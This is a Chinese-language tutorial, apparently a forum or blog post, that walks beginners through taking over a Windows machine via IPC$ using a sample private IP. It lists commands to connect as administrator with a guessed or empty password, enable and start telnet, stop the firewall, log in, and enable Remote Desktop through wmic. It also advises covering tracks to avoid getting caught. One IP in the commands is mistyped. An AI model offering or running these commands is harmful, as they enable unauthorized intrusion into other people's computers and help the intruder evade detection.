网络上通过IPC$***的说明很多,不止新手看不懂,我刚开始也看不懂,更别提去实施了

下面以IP为192.168.93.9为列

1、建立IPC$通道

先要确认自己知不知道对方的用户和密码,如果知道实施(1)跳过(2),如果不知道请用扫描(X-SCAN)工具或者测试空密码用(2)

(1)net use \\192.168.93.9 "password" /user:"administrator"    (建立有密码的连接对于域中管理 员省了很多事)

(2)net use \\192.168.93.9 "" /user:"administrator"  (建立空密码连接)

 

连接成功之后:

2、用sc命令把禁用的telnet服务变成自动
sc \\192.168.93.9 config tlntsvr start= auto
3、用sc命令将telnet启动
sc \\192.168.93.9 start tlntsvr
4、用SC命令将内置防火墙关闭
sc \\192.168.93.9 stop sharedaccess
5、telnet IP
telnet 192.168.93.9

现在什么都可以做了

--6、用sc命令将telnet关闭 ,吃完鸡,别忘了把嘴上油给擦干净哦,被抓到了就不好了。。

  sc 192168.93.9 stop tlntsvr

7、在本机执行此命令开启对方远程协助

wmic /node:"192.168.93.9" /USER:"administrator" PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

 

8、在DOS下执行.reg 注册表文件,比如注册表文件名称为a.reg

reg import a.reg
 

 

请的不清楚的或者不明白的可以发留言,我会回复的